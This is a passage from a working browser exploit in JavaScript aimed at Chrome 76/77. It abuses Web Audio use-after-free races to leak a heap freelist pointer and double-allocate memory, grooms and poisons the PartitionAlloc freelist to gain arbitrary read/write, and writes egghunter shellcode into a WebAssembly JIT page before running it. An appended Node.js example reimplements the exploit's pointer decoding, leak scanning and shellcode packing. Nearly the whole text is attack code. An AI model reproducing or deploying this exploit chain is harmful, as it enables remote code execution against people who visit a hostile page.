        let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr);
        let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr);
        let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8));
        let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8));
        let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1);
        let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1);
        let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);
        let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1);
        let StubAddrFieldOffset = undefined;

        switch (MajorVersion) {
            case 77:
                StubAddrFieldOffset = BigInt(0x8) * BigInt(16);
                break;
            case 76:
                StubAddrFieldOffset = BigInt(0x8) * BigInt(17);
                break;
        }

        let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset);
        HelperBigInt[0] = RwxJitStubPtr;
        DebugLog("... resolved JIT stub address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16));

        for(var x = 0; x < Egghunter.length; x += 8) {
            JitChunkAddress = RwxJitStubPtr + BigInt(x);
            HelperBigInt[0] = JitChunkAddress;
            //DebugLog("... writing chunk of egghunter shellcode at offset " + x.toString(10) + " to JIT region at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));

            for(var y = 0; y < 8; y++) {
                HelperUint8[y] = Egghunter[x + y];
            }

            WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]);
        }

        HelperBigInt[0] = RwxJitStubPtr;
        DebugLog("... executing shellcode at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
        WasmExport();
    }
    else {
        DebugLog("... failed to validate re-claim of FileReaderLoader slot at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
    }
}

async function PrePayloadHeapGroom() {
    DebugLog("... grooming heap in preparation for R/W primitive creation and payload execution...");
    await GC();
    DoubleAllocAudioBufs = []; // These were the "holders" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers.

    for (var j = 0; j < 80; j++) {
        MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000));
    }

    // At this stage, feedforward is double allocated: once as a feedforward of IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W.

    IIRFilters = new Array(1);
    await GC();

    for (var j = 0; j < 336; j++) {
        ImageDataArray.push(new ImageData(1, 2));
    }

    ImageDataArray = new Array(10);
    await GC();

    for (var j = 0; j < MutableFreeListAudioBufs.length; j++) {
        let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer);
        if (MutableFreeListEntry[0] != BigInt(0)) {
            let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent.
            let AllocCount = 0;
            MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr);

            // Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated

            do {
                GcPreventer.push(new ArrayBuffer(8));

                if (++AllocCount > 0x100000) {
                    DebugLog("... failed to re-claim final free list flink with alloc spray");
                    return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed
                }
            } while (MutableFreeListEntry[0] != BigInt(0));

            // The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head).

            let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays.
            GcPreventer.push(FreeListHead);
            ExecutePayload(FreeListHead);
            return;
        }
    }

    return;
}

async function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) {
    let NumberOfChannels = 1;
    let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000);
    let AudioBufferSourceNode = TempAudioCtx.createBufferSource();
    let ConvolverNode = TempAudioCtx.createConvolver();
    let Finished = false;

    // Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF)

    let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000);
    let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000);

    SmallUafBuf.getChannelData(0).fill(0);

    for (var i = 0; i < NumberOfChannels; i++) {
        var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer);
        ChannelData[0] = FeedforwardAddress;
    }

    AudioBufferSourceNode.buffer = BigSourceBuf;
    ConvolverNode.buffer = SmallUafBuf;

    // Set up the audio processing graph and begin rendering

    AudioBufferSourceNode.loop = true;
    AudioBufferSourceNode.loopStart = 0;
    AudioBufferSourceNode.loopEnd = 1;
    AudioBufferSourceNode.connect(ConvolverNode);
    ConvolverNode.connect(TempAudioCtx.destination);
    AudioBufferSourceNode.start();

    TempAudioCtx.startRendering().then(function(Buf) {
        Buf = null;

        if (Finished) {
            TempAudioCtx = null;
            setTimeout(CallbackFunc, 200);
            return;
        } else {
            Finished = true;
            setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1);
        }
    });

    while (!Finished) {
        ConvolverNode.buffer = null;
        await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer

        if (Finished) {
            break;
        }

        for (let i = 0; i < IIRFilters.length; i++) {
            OutputFloatArray.fill(0); // Initialize the array to all 0's: the Nyquist filter created by getFrequencyResponse will see it populated by PI.
            IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray);

            if (OutputFloatArray[0] != 3.1415927410125732) {
                Finished = true;
                DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/"holding" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own.
                DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000));
                AudioBufferSourceNode.disconnect();
                ConvolverNode.disconnect();
                return;
            }
        }

        ConvolverNode.buffer = SmallUafBuf;
        await Sleep(1);
    }
}

function InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) {
    SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used)
    HelperBigInt[0] = LeakedFlinkPtr;
    DebugLog("... leaked free list ptr from ScriptNode audio handler at iteration " + RenderCount.toString(10) + ": " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
    HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr);
    DebugLog("... Super page: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
    FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls into a 0x200 or 0x240 slot span.
    HelperBigInt[0] = FeedforwardSuperPageBase;
    DebugLog("... first Super Page in extent: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
    HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase);
    FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit.
    IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 into the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data.
    HelperBigInt[0] = IIRFilterFeedforwardAllocPtr;
    DebugLog("... IIRFilterFeedforwardAllocPtr: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
    DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom);
}

async function InfoleakUAF(CallbackFunc) {
    let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. When rendering begins a destination buffer of size (4 * NumberOfSampleFrames) will be allocated to hold the processed data after it travels through the ConvolverNode and ScriptNode.
    let AudioBufferSourceNode = TempAudioCtx.createBufferSource();
    let ConvolverNode = TempAudioCtx.createConvolver();
    let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel, 1 output channel.
    let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000);
    let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000);
    let Finished = false;
    let RenderCount = 0;

    ConvolverNode.buffer = ChannelBuf;
    AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full

    AudioBufferSourceNode.loop = true;
    AudioBufferSourceNode.loopStart = 0;
    AudioBufferSourceNode.loopEnd = 1;

    ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread
    AudioBufferSourceNode.connect(ConvolverNode);
    ConvolverNode.connect(ScriptNode);
    ScriptNode.connect(TempAudioCtx.destination);

    AudioBufferSourceNode.start();

    ScriptNode.onaudioprocess = function(Evt) {
        RenderCount++;
        for (let i = 0; i < 1; i++) {
            let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer);

            for (let j = 0; j < ChannelInputBuf.length; j++) {
                /*
                Notably, it is not only the first frame of the input buffer which is checked for the leaked flink.
                There are 16384 frames (each the size of a Float32) copied into the input channel buffer each
                time this handler receives an event. Typically only 0-1 of these frames will contain a leaked
                flink freelist pointer.
                */

                if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) {
                    let TempHelperBigInt = new BigUint64Array(1);
                    let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer);

                    TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer
                    TempHelperDword[1] = ChannelInputBuf[j + 1];

                    let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]);

                    // Check QWORD from SharedAudioBuffer for a non-zero value

                    if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) {
                        LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region?
                    }

                    if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) {
                        // Valid leak: end the recursion cycle for this UAF and execute a callback

                        Finished = true;
                        Evt = null;
                        AudioBufferSourceNode.disconnect();
                        ScriptNode.disconnect();
                        ConvolverNode.disconnect();
                        setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1);
                        return;
                    }
                }
            }
        }
    };

    TempAudioCtx.startRendering().then(function(Buf) {
        Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle

        if (!Finished) {
            Finished = true;
            InfoleakUAF(CallbackFunc);
        }
    });

    /*
    Attack the race condition which allows for a free list flink to be copied
    into the ScriptNode input channel buffer: the renderer thread is receiving
    data into the SharedBuffer in the Convolver, processing it, then copying
    it into the ScriptNode input channel until it is full (then the ScriptNode
    receives an event). The SharedBuffer must be freed precisely between the
    time when new data is received from the BufferSource, and the processed data
    is copied into the ScriptNode. Simply freeing the buffer will not work,
    since the next chunk of data from the BufferSource will not be placed into
    SharedBuffer if it is NULL. However, there is no check if SharedBuffer is
    NULL when the processed data it contains is copied into the ScriptNode input.
    */

    while (!Finished) {
        ConvolverNode.buffer = null;
        ConvolverNode.buffer = ChannelBuf;
        await Sleep(1); // 1ms
    }
}

function FeedforwardHeapGroom() {
    let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000);
    let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data.
    let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data.

    // Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory.

    FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at
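The infoleak handler above pulls a PartitionAlloc freelist pointer out of Float32 sample data, decodes it with ReverseBigInt and filters it for plausibility, and the payload stage later packs the egghunter into qwords for WriteQword. The following is an added example, not part of the exploit or its author's code, that models those pointer-handling steps in plain Node.js so they can be exercised without a vulnerable Chrome build. It assumes that ReverseBigInt (not shown in this fragment) is a 64-bit byte swap, which matches PartitionAlloc's byte-swapped freelist encoding; the "leaked" sample buffer it scans is constructed inline, not captured from a browser.

```javascript
// Added example: models the exploit's pointer-handling helpers in plain Node.js.
// Nothing here touches Web Audio or a vulnerable browser; the "leaked" sample
// buffer below is constructed, not captured.

// One 8-byte scratch buffer with aliased views, the same trick as the
// fragment's HelperBigInt / HelperDword / HelperUint8 globals.
const scratch = new ArrayBuffer(8);
const scratchQword = new BigUint64Array(scratch);
const scratchDword = new Uint32Array(scratch);

// 64-bit byte swap. Assumption: this is what the fragment's ReverseBigInt does.
// PartitionAlloc stores freelist "next" pointers byte-swapped so a stale entry
// does not look like a usable address; the exploit swaps leaked entries back
// (infoleak) and swaps target addresses forward before planting them
// (DoubleAllocUAF, PrePayloadHeapGroom).
const swapBytes = new Uint8Array(8);
const swapQword = new BigUint64Array(swapBytes.buffer);
function byteSwap64(value) {
  swapQword[0] = BigInt.asUintN(64, value);
  swapBytes.reverse();
  return swapQword[0];
}

// Plausibility filter as written in the onaudioprocess handler: reject anything
// that fits in 32 bits or exceeds the 48-bit user-mode range. The 0x8000 /
// 0x800000000000 adjustment is reproduced as the exploit has it; it is that
// author's heuristic, not a documented address-space rule.
function plausibleUserPointer(candidate) {
  let ptr = BigInt.asUintN(64, candidate);
  if ((ptr >> 32n) > 0x8000n) ptr -= 0x800000000000n;
  if (ptr < 0xFFFFFFFFFFFFn && ptr > 0xFFFFFFFFn) return ptr;
  return null;
}

// Walk a channel's Float32 samples as dword pairs, as the handler walks
// Evt.inputBuffer, and return the first pair that decodes to a plausible pointer.
// Real leaks arrive as samples that went through the audio graph, so bit
// patterns that are NaN or denormal may not survive intact; the exploit copes
// by scanning every frame and re-running the render until a candidate passes.
function scanChannelForLeakedPointer(samples) {
  const dwords = new Uint32Array(samples.buffer, samples.byteOffset, samples.length);
  for (let j = 0; j + 1 < dwords.length; j++) {
    if (dwords[j] === 0 || dwords[j + 1] === 0) continue;
    scratchDword[0] = dwords[j];
    scratchDword[1] = dwords[j + 1];
    const ptr = plausibleUserPointer(byteSwap64(scratchQword[0]));
    if (ptr !== null) return { frame: j, pointer: ptr };
  }
  return null;
}

// Split shellcode bytes into little-endian qwords for a qword write primitive.
// The tail is zero-padded, which is also what the fragment's loop ends up
// doing: Egghunter[x + y] past the end yields undefined, stored as 0.
function packQwords(bytes) {
  const qwords = [];
  for (let x = 0; x < bytes.length; x += 8) {
    const chunk = new Uint8Array(8);
    chunk.set(bytes.subarray(x, Math.min(x + 8, bytes.length)));
    qwords.push(new BigUint64Array(chunk.buffer)[0]);
  }
  return qwords;
}

// Constructed input: `frames` frames of silence with one encoded freelist entry
// planted at `frame`, standing in for what the freed SharedAudioBuffer leaks.
function constructLeakSample(pointer, frame, frames = 64) {
  const samples = new Float32Array(frames);
  const dwords = new Uint32Array(samples.buffer);
  const encoded = byteSwap64(pointer);
  dwords[frame] = Number(encoded & 0xFFFFFFFFn);
  dwords[frame + 1] = Number(encoded >> 32n);
  return samples;
}

const demo = scanChannelForLeakedPointer(constructLeakSample(0x12345678abc0n, 10));
console.log(demo && `leak at frame ${demo.frame}: 0x${demo.pointer.toString(16)}`);
```

Run with `node`: the planted entry is found at frame 10 and decodes back to the original address, showing that the same swap serves both directions of the exploit (reading a leaked flink and forging one).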